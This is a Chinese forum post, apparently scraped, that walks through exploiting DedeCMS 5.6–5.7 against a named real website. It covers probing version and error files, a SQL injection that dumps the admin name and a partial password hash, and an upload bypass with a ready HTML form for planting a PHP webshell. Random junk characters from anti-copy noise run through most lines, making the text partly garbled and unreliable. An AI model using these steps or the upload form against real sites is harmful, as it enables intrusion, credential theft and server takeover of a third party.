dedecms5.6-5.7注入与上传漏洞利用

admin

①注入漏洞。
这站 http://www.political-security.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，
4 @; R3 m1 W6 S- J. X9 Twww.political-security.com/data/mysql_error_trace.inc 爆后台
# s/ `0 r) O8 |6 d( C+ H  _然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。
. p. L+ a6 i8 @: a9 R8 r, Y9 i然后写上语句
8 |0 B9 h: H* ^查看管理员帐号
http://www.political-security.co ... &membergroup=@`
( |/ f4 i8 f9 ~* f; c
admin
/ o0 ~6 m5 _- @0 H+ X' S/ _9 F- N
查看管理员密码
　http://www.political-security.co ... &membergroup=@`

5 ~, n* @1 p% n3 n8d29b1ef9f8c5a5af429
% n3 v9 E3 O/ X- O+ s
查看管理员密码
6 I. b% J( j4 K! V$ W; U/ I
; d& B7 d8 f) c0 Y得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5

8d2
9b1ef9f8c5a5af42
! f* x1 _/ l" W* U3 I4 {9 d2 G$ ~9

' l/ f  n) d( p; m. I' Bcmd5没解出来 只好测试第二个方法
, X  b1 c' q4 n7 y- O/ |8 }

' @  s; w# D5 `; A5 i& x- C( |②上传漏洞：

5 e7 H6 |& Z% Q' J' q只要登陆会员中心，然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”

如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

6 l% ]: p9 {( Q5 |于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm
' Z! Y$ D8 o: r0 I, b9 H
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
4 N# E% w. s) D5 J或者
即可上传成功